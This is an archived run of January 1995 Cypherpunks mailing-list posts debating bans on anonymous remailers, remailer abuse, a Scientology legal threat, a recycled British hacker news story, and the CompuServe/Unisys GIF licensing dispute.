>    Which would probably amount to sniffing all packet traffic.
> 
>    If that ban was implemented, so would ways around it be implemented.  
> I would prefer that they not need to be invented but if they must be, 
> they will be.

This same topic--the outlawing of anonymity and anonymous
remailers--is also being debated on the Cyberia list, as many of you
know. (Timely, I guess, because of the Siegel comments, the Lewis
article, and the Church of Scientology threats.)

The ways around such a ban are so patently obvious that any such "ban"
is unenforceable. I wrote a piece on this for the Cyberia list, but
this was my single most important point:

If anonymous mail is outlawed, then the anonymous mailers can attach
real names. To wit, all mail from a famous remailing site in the
Netherlands could be marked as being from "Hans Brinker." This would
presumably meet the letter of the law, if not the "spirit." (I always
did hate this "spirit.")

Further, sites which "forward" anonymous mail, or mail from "Hans
Brinker," are in most cases precluded by the ECPA from screening this
mail or otherwise examining it.

I see no prospect whatsoever that a ban on anonymous mail could be
implemented, enforced, or upheld in the courts.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael  Conlen <meconlen@IntNet.net>
Date: Wed, 4 Jan 95 15:17:09 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SV4.3.91.950103221946.23162A-100000@xcalibur>
Message-ID: <Pine.SV4.3.91.950104173902.16102A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 3 Jan 1995, Jonathan Cooper wrote:

> >    Martha Siegel is just fucked up enough that she will probably push
> > for legislation regulating the nets. Congress is just fucked up that
> > they might pass it.
> 
>    And if they do I will make it a definite point to do all I can to 
> emigrate to the UK, the Netherlands, or somewhere else.
> 
>    This country is increasingly becoming a police state, and I've got too 
> many years of life left to just passively deal with it.

As I understand it, the government owns a portion of the internet. What 
they want to regulate about that is their business. What I want to know 
is how can they regulate what private business and citizens do with 
their Fiber Optics, ISDN lines, telephone lines, and computers. If the 
government was to ban anything on the net, it would surely seem to me to 
be in violation of the first amendment. Things like pirated software, 
being illegal already, is one thing, but our mail, conversations, etc. is 
different. 

	Does anyone have any information on what grounds Siegel and Lewis 
plan to use for legislation? If they do pass laws regulating the 'net I 
hope someone comes up with a no-spamming law, then I am getting a ticket 
on Jon Cooper's plane out of the country. 

						Groove on Dude
						Michael Conlen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Wed, 4 Jan 95 15:07:09 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
Message-ID: <199501042312.SAA03816@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501042047.PAA06797@cutter.clas.ufl.edu>,
Avi Harris Baumstein <avi@clas.ufl.edu> wrote:
>i know there has been much chatter on this subject, but are there
>truly any precedents that could hold on the anonymous distribution of
>copyrighted material? are remailer-ops truly in legal danger?  what
>exactly constitutes a trade secret, and what sort of laws apply?

This is oddly timely.  The LaMacchia decision showed that providing a
service for others to use for the distribution of copyrighted material
(in his case, copyrighted software) was not prosecutable under Wire
Fraud statutes.  The judge told the Feds, "no dice.  Stop trying to
apply laws to areas where they weren't intended."

Civil matters are another matter, of course, but that's one avenue
that's closed.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwrwjBNhgovrPB7dAQHIYAP6AtRFkIqOj+vRPxUPLdGaUK9t9/pZQi8g
6HyXHBjaEA9ygX8ALQEbS3AK1a1DsqWIsOxXVivszfEY+1lmS3w93VnICjigebbf
YuHpFOOgyf8IkUBslov1V7Pw0/X/blMVspyc1nDigK3KsyMi7PalAw5ECECqkhkD
AizVLOZNrO0=
=yOiL
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwsrTyoZzwIn1bdtAQH9xAF/dFkiStD+csfx4ATJ76WaxrfcLPEYej+p
Ec55BXkOYH+96xGLHugficY5hRjtL5eL
=LPEW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 4 Jan 95 16:11:42 PST
To: cypherpunks@toad.com
Subject: Re: British Hacker Article
Message-ID: <9501042343.AB19355@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:31 PM 1/4/95 -0500, Duncan Frissell wrote:
>>From The Independent (London) Tuesday 3 January 1995 - Front Page

> ... The US Defence Information
>Systems Agency admitted in a private briefing, which has been confirmed,
>that the hackers had affected the Department's "military readiness."

"Admitted"?  Probably "complained without substantiation" would be more accurate.

> ...  It is understood that
>he invented a "sniffer" programme which searched across hundreds of
>computers attached to the Internet for passwords and user names. ...

If he was really behind the various password sniffers running on Netcom, 
etc, he has a lot of explaining to do.

> ...  "They contained information about
>firing sites in North Korea and stuff like that.  Field intelligence.  He
>kept detailed logs of communication traffic.  ... The Korean files were on 
>the Girths Air Force Base computer system and therefore they could have been 
>accessed.  ...

Harumpf.  Either the stuff wasn't classified, or else someone had a major 
security procedures breach and had classified material sitting on a computer 
with an uncrypted comm link.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 4 Jan 95 16:21:19 PST
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: San Francisco Editorial
In-Reply-To: <Qj2fAKT0Eyt5BUJxh8@nsb.fv.com>
Message-ID: <Pine.SV4.3.91.950104190752.17118D-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> A letter to the editor is like spitting into the wind in this case.   I
> think what's needed is a more constructive affirmative action, ideally
> taking Cantor and Siegel to court somewhere.

   Perhaps it's my libertarian outlook, perhaps not, but I tend to abhor 
using the US government's ``legal'' system for almost any reason.  

   The worst thing about doing this (suing them), IMHO, is that if you 
lost you would create a precedent for all the people who aren't doing it 
because they might consider it illegal or immoral -- far too many people 
consider things that the court okays to be morally okay.  

   Instead, I think it's a great stimulus for better software - there's 
no reason to sue them when it'd be a better thing for the community if 
newsreaders and mailreaders were enhanced to deal with spams.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 4 Jan 95 16:27:25 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Regulatory Risks
In-Reply-To: <Pine.3.89.9501041009.A14363-0100000@netcom10>
Message-ID: <Pine.SV4.3.91.950104191626.17118E-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Criminalize anonymity, and tell the internet providers to figure
> out how to enforce it or face confiscation.

   Which would probably amount to sniffing all packet traffic.

   If that ban was implemented, so would ways around it be implemented.  
I would prefer that they not need to be invented but if they must be, 
they will be.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 4 Jan 95 16:29:09 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SUN.3.91.950104135455.7622A-100000@access3.digex.net>
Message-ID: <Pine.SV4.3.91.950104191751.17118F-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> I tend to focus on the subject matter economist prints.  I just find it 
> more on target than most if not all of the major U.S. media sources.

   I find _Reason_ quite excellent as well.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 4 Jan 95 16:37:41 PST
To: Michael Conlen <meconlen@IntNet.net>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SV4.3.91.950104173902.16102A-100000@xcalibur>
Message-ID: <Pine.SV4.3.91.950104192503.17118H-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> As I understand it, the government owns a portion of the internet. What 

   Yes.  And through my work's upcoming link, so will they.  So what?

> they want to regulate about that is their business. What I want to know

   On their own networks, surely.
 
> is how can they regulate what private business and citizens do with 
> their Fiber Optics, ISDN lines, telephone lines, and computers. If the

   They already do - look at the regulations on telcos, power companies, 
water companies, cellular/paging companies, lawyers, doctors, etc. 
 
> government was to ban anything on the net, it would surely seem to me to 
> be in violation of the first amendment. Things like pirated software, 

   An interesting point.  Any legal views from someone more versed in the 
law than I?

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 4 Jan 95 16:40:13 PST
To: Doug Barnes <db@Tadpole.COM>
Subject: Re: Remailer Abuse
In-Reply-To: <9501042320.AA07624@tadpole.tadpole.com>
Message-ID: <Pine.SV4.3.91.950104192839.17118I-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> The problem with a _free_ remailer is obvious -- like many
> other Internet resources, it can suffer from the tragedy of
> the commons. 

    See the remailer at c2.org as an example - quite nice, and has a 
pay-for-more than n bandwidth agreement.  Works fine for a few small 
chatty messages, won't work worth a damn for spamming.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Wed, 4 Jan 95 17:31:32 PST
To: db@Tadpole.COM
Subject: Re: Remailer Abuse
In-Reply-To: <9501042320.AA07624@tadpole.tadpole.com>
Message-ID: <m0rPh5t-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: db@Tadpole.COM (Doug Barnes)
   Date: Wed, 4 Jan 1995 16:38:21 -0600 (CST)
   Cc: cypherpunks@toad.com

   The problem with a _free_ remailer is obvious -- like many
   other Internet resources, it can suffer from the tragedy of
   the commons. 

   Even a negligible fee would do much to prevent gross remailer
   abuse. It may not be feasible to make remailers in to an
   industry, but this isn't the point -- it will keep the utterly
   lame from using it for pranks and their ilk.

Use First Virtual.  The "information" that you sell is a one-time
email alias that points to your remailer.  After an hour, that email
alias gets disabled.  This dynamic setup is easy to do with smail,
just a matter of dropping a file into a directory.

And who cares if they pay you or not, because if they don't pay
(choose to purchase the information), eventually FV will cancel their
account.

Send mail to info@fv.com.  This gets you an automated response.

Their contract says that they won't enforce payment on services, so if
you offer a service, you're completely at risk, but again, there's not
much real risk here...

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 4 Jan 95 17:37:07 PST
To: Aron Freed <cypherpunks@toad.com>
Subject: Re: good news about the EFF...
Message-ID: <ab30fe08050210045295@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 PM 01/01/95, Aron Freed wrote:
>Has anyone seen Monty Python's Life of Brian.....  Do I hear a parallelism???
>Something to the effect of "The People's Judean Front", "The Popular
>People's Front", and it goes on and on....
>
>How about for the modern approach.... CDT, EFF, CPSR, Cypherpunks... Do I
>hear more.. Or are we so split up that we can't agree on our common goal....

The more the merrier, in my opinion. As long as they can all get funding,
which admittedly could be a problem, but presumably if it is then some of
the organizations will just drop out. *shrug*  But in general,
decentralization is good, right?  I'd rather have 5 organizations defending
electronic rights than just one, when we know all too well how possible it
is for that just one to negotiate a compromise that seems more like a
betrayal.  The more active, funded organizations, the more it appears to
legislators like people are really concerned about this stuff, and the
safer we are against point-failure.  Decentralize, distribute, good.  :)

[Of course it remains to be seen if so many organizations at once can
remain active and well funded.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 4 Jan 95 13:02:33 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
Message-ID: <9501042102.AA22721@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


>      These  confidential  materials  being posted were stolen from
>      my client.  There is reason to  believe  that  the  materials
>      which  are  uploaded by these users may also be downloaded by
>      other users, 


What makes him think that anyone (except thetans who spend all their
money on Scientology anyway) wants to have this "material" and waste 
any diskspace or bandwidth on it?


Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Wed, 4 Jan 95 20:52:46 PST
To: nelson@crynwr.com (Russell Nelson)
Subject: Re: Remailer Abuse
In-Reply-To: <m0rPh5t-0008ZFC@crynwr.crynwr.com>
Message-ID: <9501050453.AA10198@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain


>    The problem with a _free_ remailer is obvious -- like many
>    other Internet resources, it can suffer from the tragedy of
>    the commons. 
> 
>    Even a negligible fee would do much to prevent gross remailer
>    abuse. It may not be feasible to make remailers in to an
>    industry, but this isn't the point -- it will keep the utterly
>    lame from using it for pranks and their ilk.
> 
> Use First Virtual.  The "information" that you sell is a one-time
> email alias that points to your remailer.  After an hour, that email
> alias gets disabled.  This dynamic setup is easy to do with smail,
> just a matter of dropping a file into a directory.

Heh. An anonymous remailer paid for by credit card... there'd
have to be an additional level of indirection for it to work,
which would make the methods for tracking those who don't pay
quite problematic.

Also, most remailer abuse tends to be of the hit-and-run variety,
which is still nicely enabled by FV.

Anonymous remailers pretty much require anonymous digital cash,
although this could be built on top of some other electronic
payment system with somewhat less payment lag and reversibility 
than FV.

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Wed, 4 Jan 95 19:11:15 PST
To: cypherpunks@toad.com
Subject: The NYTimes article
Message-ID: <m0rPif2-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


The New York Times article is on Nando (News and Observer)'s WWW server:

http://www.nando.net/newsroom/nt/inf/01029537644.html

For those who haven't seen it...

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Wed, 4 Jan 95 20:58:12 PST
To: entropy@IntNet.net (Jonathan Cooper)
Subject: Re: Remailer Abuse
In-Reply-To: <Pine.SV4.3.91.950104192839.17118I-100000@xcalibur>
Message-ID: <9501050458.AA10237@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain


>     See the remailer at c2.org as an example - quite nice, and has a 
> pay-for-more than n bandwidth agreement.  Works fine for a few small 
> chatty messages, won't work worth a damn for spamming.
> 

I like both this idea and this particular service. I didn't mean to
imply that nobody was charging/reducing spam.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wulkwa@near.net
Date: Wed, 4 Jan 95 13:47:22 PST
To: cypherpunks@toad.com
Subject: Regulatory Risks
Message-ID: <199501042146.QAA08343@nova.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


I think it's important to realize that organizations move on a slower
time scale than people.  The larger the organization, the longer the
time scale.  Thus, when looking at the government's response to
anonymous transactions it would be wise to look at trends dating back
to the '70s (if not earlier).  Also, it's important to realize that
such long-term activities are systemic in nature.

Examples of government attacks on anonymous activities might include
the war on drugs (especially the money laundering countermeasures).

W.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aron Freed <s009amf@discover.wright.edu>
Date: Wed, 4 Jan 95 20:30:14 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: good news about the EFF...
In-Reply-To: <ab30fe08050210045295@[132.162.201.201]>
Message-ID: <Pine.SUN.3.91.950104232756.9001A-100000@discover>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Jan 1995, Jonathan Rochkind wrote:
> which admittedly could be a problem, but presumably if it is then some of
> the organizations will just drop out. *shrug*  But in general,
> decentralization is good, right?  I'd rather have 5 organizations defending
> electronic rights than just one, when we know all too well how possible it
> is for that just one to negotiate a compromise that seems more like a
> betrayal.  The more active, funded organizations, the more it appears to
> legislators like people are really concerned about this stuff, and the
> safer we are against point-failure.  Decentralize, distribute, good.  :)
> 
> [Of course it remains to be seen if so many organizations at once can
> remain active and well funded.]

A good point, but I was just trying to make the point of too many 
organizations becomes very silly....

But thanks for pointing out the other extreme...




| A(a)ron M. Freed            | It is naive to believe people are honest. |
| s009amf@discover.wright.edu | It is naive to believe programmers are    |
| (513)276-3817 (voice)       | honest. It is even more naive to believe  |
| (513)276-4158 (data/fax)    | the government is honest. Down with Big   |
|			      | Brother.		                  |
|_____________________________|___________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 5 Jan 95 00:02:06 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
In-Reply-To: <199501042047.PAA06797@cutter.clas.ufl.edu>
Message-ID: <199501050801.AAA18013@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Avi Harris Baumstein <avi@clas.ufl.edu>

   i know there has been much chatter on this subject, but are there
   truly any precedents that could hold on the anonymous distribution of
   copyrighted material?

Cubby v. Compuserve is relevant here, as well as that bookstore case
in the 50's that I never remember the name of.  Mike G., can you help
me out on this one?

These cases are about other kinds of wrongs (libel in one and
obscenity (?) in the other), but copyright violation doesn't seem to
have any particular features to set it apart from the basic
principle of these.  Namely, if you know, you're responsible; if you
don't, you're not.  This, you all realize no doubt, is a gross
simplification of a long chain of reasoning.

   what
   exactly constitutes a trade secret, and what sort of laws apply?

The short answer is that if you didn't sign a trade secret agreement
or are party to one by some other relationship (such as agency), then
a trade secret that comes your way is no secret any more.

   >    clients'  property   rights.    Courts   are   holding   such
   >    contributory  infringers  liable.   Two  examples  are:  Sega
   >    Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
   >    Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
   >    1152 (M.D.  Fla.  1993).

   what of these cases? is this just an example of typical lawyerly
   intimidation tactics? 

I have personal experience with the first case.  It was a local BBS
run by a friend of a friend, and I got involved a year ago right after
the seizure.  (It was, BTW, a _civil_ seizure of a BBS, not criminal.)
I believe the case settled out of court.  There were court documents
approving the seizure however; I don't know if these set precedent or
not.  I suspect not, because the action was entirely _ex parte_ (Latin
for one-sided).  Mike, again?  Other legal folk?

I know nothing about the second one.

   how do you remailer-ops plan to react? my first
   instinct (were i running a remailer) would be to ignore it, on grounds
   that i wouldn't examine any mail passing through. 

The people who keep logs, yes, are in more danger than those who don't.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 4 Jan 95 20:58:24 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <199501050503.AAA07022@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

The Dalai Lama writes:
> I know that in Delaware it is illegal for a merchant to request ID when 
> you pay by credit card.  I'm not sure if this is wide spread or just 
> local. 

As I recall there was something of a national outcry about this practice
several years back. I think California outlawed it at the time, along with
other states, though I don't know if any federal law was passed.

Since I understand MBNA America is the second-largest employer in Delaware,
I'd guess that if Delaware banned it, so did most states.

Retail stores often asked one to write one's phone number on the check when
paying that way. I remember my father habitually writing the police dept.'s
non-emergency number in all such cases :]

> -- [Here's something for those friendly mail scanners...]
> [...] LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche

"quiche" ?  

The *real* Four Horsemen don't eat quiche !

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwt9kSoZzwIn1bdtAQFIrgF+OxMRUbtLW4JhKFMxvdNg62v6Lqdb5Bog
IRrUySoeo39h5EL9474TY9Gnd4r7debR
=iplm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an172607@anon.penet.fi (duquesne duke)
Date: Wed, 4 Jan 95 17:24:22 PST
To: cypherpunks@toad.com
Subject: gif format in newsbytes
Message-ID: <9501050029.AA25564@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



CompuServe GIF License & Royalties Raises Hackles
COLUMBUS, OHIO, U.S.A., 1995 JAN 4 (NB) -- On-line giant CompuServe has
sparked controversy on the Internet by offering a $1-plus-royalties license
for developers to use its previously free GIF (Graphics Interchange Format)
image file format. CompuServe terms the fee an offer and a benefit to the on-
line community, but skeptics quickly dubbed it a "GIF tax."

The new fee system is based on a licensing agreement reached between
CompuServe and Unisys Corp. (NYSE:UIS) in June, 1994, for use of LZW
(Lempel-Ziv-Welch) compression in its GIF format. Unisys has claimed a patent on LZW
technology.

Under the CompuServe agreement, developers who wish to operate under the on-
line firm's LZW license agreement with Unisys pay a one-time fee of $1 plus a
royalty of 1.5 percent or 15 cents per registered program, whichever is
greater. Downloaded programs that do not get registered are not subject to
the fee, nor are end-users.

CompuServe announced the new fee system in various areas or "forums" of the
service on December 29. The timing has led to suspicions by some that the
service was not being fully honest with its members.

In an open letter, Pat Clawson, president and chief executive officer (CEO)
of TeleGrafix Communications Inc., called it "the online communications
community's equivalent of the sneak attack at Pearl Harbor," and added: "The
announcement of the CompuServe-Unisys GIF Tax on December 29, during the lull
between Christmas and New Year's Day, was clearly timed to cause maximum
damage while an unsuspecting public celebrated the holidays."

Clawson said his firm, which developed the RIPscrip 2.0 online multimedia
technology and the RIPTERM terminal program that leans heavily on the JPEG
(Joint Photographic Experts Group) image format, will drop support of GIF
images because of the new fee system. RIPscrip 2.0 is scheduled for release
January 16.

Speaking to Newsbytes, CompuServe spokesman Pierce Reid acknowledged that the
release date may have been unfortunate from a public relations viewpoint, but
he said it was an accident of timing, not a desire to avoid public scrutiny.

Reid pointed out that it took a year and a half to hammer out a licensing
agreement with Unisys Corp. (NYSE:UIS). Unisys holds a patent on the GIF
format's underlying LZW compression technology. Once the agreement with
Unisys was signed in June, 1994, he added, it took CompuServe another six
months to arrive at a way to, as he put it, "share" the license.

"Six months is not a long time to settle the details of a licensing
agreement, if you know how these things work," he told Newsbytes. "We're not
making any money on this. We paid a substantial fee to Unisys for the
license, and we offered to share the license for the benefit of the
development community as well as for ourselves and our subscribers."

Reid said the license was based on the fact that CompuServe had found merit
in a Unisys patent claim. CompuServe had used the patented LZW technology in
its 1987 development of the GIF format, believing the technology to be in the
public domain. Unisys contacted the on-line firm about its patent claim in
1993, and that eventually led to the December 29 announcement, the firm said.

Commented Reid: "I've been watching the Internet, and those who are
commenting are on a bell curve -- the vast majority are taking a reasonable
view, but there are always those out on the extreme ends.

"A number of people regard this as a real benefit. CompuServe, by requiring
no money for negotiations, is saving developers from the need to waste time.
There's no worrying about legal or licensing issues, and we've done that for
a dollar."

(Craig Menefee/19950104/Press Contact: Pierce Reid, CompuServe, 614-538-4571;
Pat Clawson, TeleGrafix, 714-379-2140, Internet e-mail
rip.support@telegrafix.com; Oliver Picher, Unisys, 215-986-5367)


Unisys Seeks Royalties On GIF Algorithm
BLUE BELL, PENNSYLVANIA, U.S.A., 1995 JAN 4 (NB) -- Unisys Corp. (NYSE:UIS)
said it will seek royalty payments from developers of software using the
Graphic Interchange Format (GIF). Unisys said it owns rights to an algorithm
that is widely used in GIF tools.

Oliver Picher, a spokesman for Unisys, told Newsbytes that the online service
CompuServe introduced the GIF format in 1987, and incorporated the Unisys
algorithm, apparently believing it was in the public domain. Unisys learned
that the algorithm was used in the GIF technology about two years ago,
contacted CompuServe, and in June, 1994, the companies reached an agreement
under which CompuServe paid Unisys an undisclosed sum for use of the
algorithm.

The payment was "a reasonable amount but not an overwhelming amount," Picher
said, declining to reveal the exact sum.

CompuServe was the first to license the algorithm from Unisys for use in a
GIF tool, Picher said, but about 100 companies have licensed it for other
purposes. Picher said one other online information service has already
licensed the algorithm, but could not say if it was for GIF-related use in
that case.

Unisys is negotiating with all the major online services for possible license
agreements, Picher said. While he would not give specifics, he said the terms
Unisys is seeking are "very reasonable to the point where license fees
shouldn't be a barrier" to using GIF. He added that people who have GIF
software on their PCs will not be affected.

The same algorithm is also used in the Tagged Image File Format (TIFF)
graphics format, and Unisys concluded a license agreement with Aldus Corp.
some time ago, Picher said.

(Grant Buckler/19950104/Press Contact: Oliver Picher, Unisys, 215-986-5367)


-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name withheld on request)
Date: Wed, 4 Jan 95 18:35:29 PST
To: cypherpunks@toad.com
Subject: British Hacker Story
Message-ID: <199501050236.AA22300@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



   From: newsbytes@clarinet.com (NB-LON)
   Subject: London Newspaper Runs Old "Superhacker" Story
   01/03/95
   Date: 3 Jan 95 20:44:22 GMT

   LONDON, ENGLAND, 1995 JAN 3 (NB) -- As the UK started back
   to work today after the long Christmas and New Year
   shutdown, readers of the Independent newspaper were treated
   to the banner headline "British Boy Raided US Defense
   Secrets."

   The curious thing about the story was that none of the
   other national papers or news wires carried any reports. On
   investigation, Newsbytes discovered why -- the story dates
   back to July of last year, and briefly resurfaced in early
   November on the US news wires.

   According to the Independent, a 16-year-old British boy has
   been arrested in connection with alleged unauthorized
   intrusions into the US government's computers and "was able
   to watch secret communications between US agents in North
   Korea during the crisis over nuclear inspections last
   spring."

   The story is quite correct, except that the boy in question
   was arrested last July, when the original story broke.
   Commenting on the story, Peter Sommer, a leading security
   consultant and a senior with the Computer Research Center
   at the London School of Economics, said that it smacked of
   the British Telecom secrets case of late November, also
   reported in the Independent.

   That story, as reported by Newsbytes, turned out to be
   something of a non-event when the hacker, who posted
   details of top secret files on BT's ex-directory computer
   "across the Internet," turned out to be Steve Fleming, a
   Scottish freelance journalist who worked as a temp for BT
   in the summer and broke BT's own security rules by
   downloading files from the BT's Customer Service System
   (CSS) computer, then mailed them -- across the Internet --
   to other people.

   "I'm amazed at the Independent running yet another story
   involving the Internet," Sommer told Newsbytes, adding that
   it is "a very old story. It seems that all they have to do
   is to work up a story about a hacking attempt, whether
   successful or not, and weave in a story about the Internet,
   and it's a headline story."

   Ken Young, newly installed editor of Communicate, a leading
   industry communications magazine in London, and a veteran
   of the UK communications industry for more than a decade,
   told Newsbytes that the story seemed a little thin.

   "It looks like another hacking story except that (the
   newspaper) has written in something about the Internet, and
   bingo! You've got a report that the information was
   accessible to 32 million users on the Internet," he said.

   Sommer, meanwhile, told Newsbytes that he had made his own
   discreet inquiries about the story with high level
   authorities when it broke last summer.

